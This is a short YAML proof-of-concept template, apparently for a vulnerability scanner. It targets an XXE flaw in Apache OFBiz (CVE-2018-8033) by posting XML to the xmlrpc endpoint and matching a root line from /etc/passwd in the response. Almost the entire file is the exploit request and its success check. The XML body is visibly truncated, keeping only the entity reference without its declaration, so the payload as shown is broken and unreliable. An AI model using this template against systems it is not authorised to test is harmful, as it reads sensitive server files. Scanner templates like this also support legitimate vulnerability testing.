name: poc-yaml-apacheofbiz-cve-2018-8033-xxe rules: - method: POST path: /webtools/control/xmlrpc headers: Content-Type: application/xml body: >- ]>&disclose; follow_redirects: false expression: > response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) && response.content_type.contains("text/xml") detail: author: su(https://suzzz112113.github.io/#blog) links: - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py